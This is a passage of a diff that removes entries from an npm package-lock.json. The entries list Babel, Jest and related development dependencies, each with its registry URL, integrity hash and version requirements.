"https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/compat-data": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.22.6.tgz", - "integrity": "sha512-29tfsWTq2Ftu7MXmimyC0C5FDZv5DYxOZkh3XD3+QW4V/BYuv/LyEsjj3c0hqedEaDt6DBfDvexMKU8YevdqFg==", - "dev": true - }, - "@babel/core": { - "version": "7.22.8", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.22.8.tgz", - "integrity": "sha512-75+KxFB4CZqYRXjx4NlR4J7yGvKumBuZTmV4NV6v09dVXXkuYVYLT68N6HCzLvfJ+fWCxQsntNzKwwIXL4bHnw==", - "dev": true, - "requires": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.22.5", - "@babel/generator": "^7.22.7", - "@babel/helper-compilation-targets": "^7.22.6", - "@babel/helper-module-transforms": "^7.22.5", - "@babel/helpers": "^7.22.6", - "@babel/parser": "^7.22.7", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.8", - "@babel/types": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "requires": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - } - }, - "@babel/helper-compilation-targets": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.22.6.tgz", - "integrity": "sha512-534sYEqWD9VfUm3IPn2SLcH4Q3P86XL+QvqdC7ZsFrzyyPF3T4XGiVghF6PTYNdWg6pXuoqXxNQAhbYeEInTzA==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.22.6", - "@babel/helper-validator-option": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "browserslist": "^4.21.9", - "lru-cache": "^5.1.1" - } - }, - "@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true - }, - "@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "requires": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - } - }, - "@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-imports": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.22.5.tgz", - "integrity": "sha512-8Dl6+HD/cKifutF5qGd/8ZJi84QeAKh+CEe1sBzz8UayBBGg1dAIJrdHOcOM5b2MpzWL2yuotJTtGjETq0qjXg==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-transforms": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.22.5.tgz", - "integrity": "sha512-+hGKDt/Ze8GFExiVHno/2dvG5IdstpzCq0y4Qc9OJ25D4q3pKfiIP/4Vp3/JvhDkLKsDK2api3q3fpIgiIF5bw==", - "dev": true, - "requires": { - "@babel/helper-environment-visitor": "^7.22.5", - "@babel/helper-module-imports": "^7.22.5", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.5", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.5", - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.22.5.tgz", - "integrity": "sha512-uLls06UVKgFG9QD4OeFYLEGteMIAa5kpTPcFL28yuCIIzsf6ZyKZMllKVOCZFhiZ5ptnwX4mtKdWCBE/uT4amg==", - "dev": true - }, - "@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.22.5.tgz", - "integrity": "sha512-R3oB6xlIVKUnxNUxbmgq7pKjxpru24zlimpE8WK47fACIlM0II/Hm1RS8IaOI7NgCr6LNS+jl5l75m20npAziw==", - "dev": true - }, - "@babel/helpers": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.22.6.tgz", - "integrity": "sha512-YjDs6y/fVOYFV8hAf1rxd1QvR9wJe1pDBZ2AREKq/SDayfPzgk0PBnVuTCE5X1acEpMMNOVUqoe+OwiZGJ+OaA==", - "dev": true, - "requires": { - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.6", - "@babel/types": "^7.22.5" - } - }, - "@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.22.5.tgz", - "integrity": "sha512-gvyP4hZrgrs/wWMaocvxZ44Hw0b3W8Pe+cMxc8V1ULQ07oh8VNbIRaoD1LRZVTvD+0nieDKjfgKg89sD7rrKrg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.22.5" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.22.5.tgz", - "integrity": "sha512-1mS2o03i7t1c6VzH6fdQ3OA8tcEIxwG18zIPRp+UY1Ihv6W+XZzBCVxExF9upussPXJ0xE9XRHwMoNs1ep/nRQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.22.5" - } - }, - "@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - } - }, - "@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - } - }, - "@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.6.1.tgz", - "integrity": "sha512-Aj772AYgwTSr5w8qnyoJ0eDYvN6bMsH3ORH1ivMotrInHLKdUz6BDlaEXHdM6kODaBIkNIyQGzsMvRdOv7VG7Q==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0" - } - }, - "@jest/core": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.6.1.tgz", - "integrity": "sha512-CcowHypRSm5oYQ1obz1wfvkjZZ2qoQlrKKvlfPwh5jUXVU12TWr2qMeH8chLMuTFzHh5a1g2yaqlqDICbr+ukQ==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/reporters": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.5.0", - "jest-config": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-resolve-dependencies": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "jest-watcher": "^29.6.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - } - }, - "@jest/environment": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.6.1.tgz", - "integrity": "sha512-RMMXx4ws+Gbvw3DfLSuo2cfQlK7IwGbpuEWXCqyYDcqYTI+9Ju3a5hDnXaxjNsa6uKh9PQF2v+qg+RLe63tz5A==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1" - } - }, - "@jest/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-N5xlPrAYaRNyFgVf2s9Uyyvr795jnB6rObuPx4QFvNJz8aAjpZUDfO4bh5G/xuplMID8PrnuF1+SfSyDxhsgYg==", - "dev": true, - "requires": { - "expect": "^29.6.1", - "jest-snapshot": "^29.6.1" - } - }, - "@jest/expect-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.6.1.tgz", - "integrity": "sha512-o319vIf5pEMx0LmzSxxkYYxo4wrRLKHq9dP1yJU7FoPTB0LfAKSz8SWD6D/6U3v/O52t9cF5t+MeJiRsfk7zMw==", - "dev": true, - "requires": { - "jest-get-type": "^29.4.3" - } - }, - "@jest/fake-timers": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.6.1.tgz", - "integrity": "sha512-RdgHgbXyosCDMVYmj7lLpUwXA4c69vcNzhrt69dJJdf8azUrpRh3ckFCaTPNjsEeRi27Cig0oKDGxy5j7hOgHg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "@jest/globals": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.6.1.tgz", - "integrity": "sha512-2VjpaGy78JY9n9370H8zGRCFbYVWwjY6RdDMhoJHa1sYfwe6XM/azGN0SjY8kk7BOZApIejQ1BFPyH7FPG0w3A==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/types": "^29.6.1", - "jest-mock": "^29.6.1" - } - }, - "@jest/reporters": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.6.1.tgz", - "integrity": "sha512-9zuaI9QKr9JnoZtFQlw4GREQbxgmNYXU6QuWtmuODvk5nvPUeBYapVR/VYMyi2WSx3jXTLJTJji8rN6+Cm4+FA==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - } - }, - "@jest/schemas": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.0.tgz", - "integrity": "sha512-rxLjXyJBTL4LQeJW3aKo0M/+GkCOXsO+8i9Iu7eDb6KwtP65ayoDsitrdPBtujxQ88k4wI2FNYfa6TOGwSn6cQ==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.27.8" - } - }, - "@jest/source-map": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.0.tgz", - "integrity": "sha512-oA+I2SHHQGxDCZpbrsCQSoMLb3Bz547JnM+jUr9qEbuw0vQlWZfpPS7CO9J7XiwKicEz9OFn/IYoLkkiUD7bzA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.6.1.tgz", - "integrity": "sha512-Ynr13ZRcpX6INak0TPUukU8GWRfm/vAytE3JbJNGAvINySWYdfE7dGZMbk36oVuK4CigpbhMn8eg1dixZ7ZJOw==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.6.1.tgz", - "integrity": "sha512-oBkC36PCDf/wb6dWeQIhaviU0l5u6VCsXa119yqdUosYAt7/FbQU2M2UoziO3igj/HBDEgp57ONQ3fm0v9uyyg==", - "dev": true, - "requires": { - "@jest/test-result": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "slash": "^3.0.0" - } - }, - "@jest/transform": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.6.1.tgz", - "integrity": "sha512-URnTneIU3ZjRSaf906cvf6Hpox3hIeJXRnz3VDSw5/X93gR8ycdfSIEy19FlVx8NFmpN7fe3Gb1xF+NjXaQLWg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - } - }, - "@jest/types": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.1.tgz", - "integrity": "sha512-tPKQNMPuXgvdOn2/Lg9HNfUvjYVGolt04Hp03f5hAk878uwOLikN+JzeLY0HcVgKgFl9Hs3EIqpu3WX27XNhnw==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, - 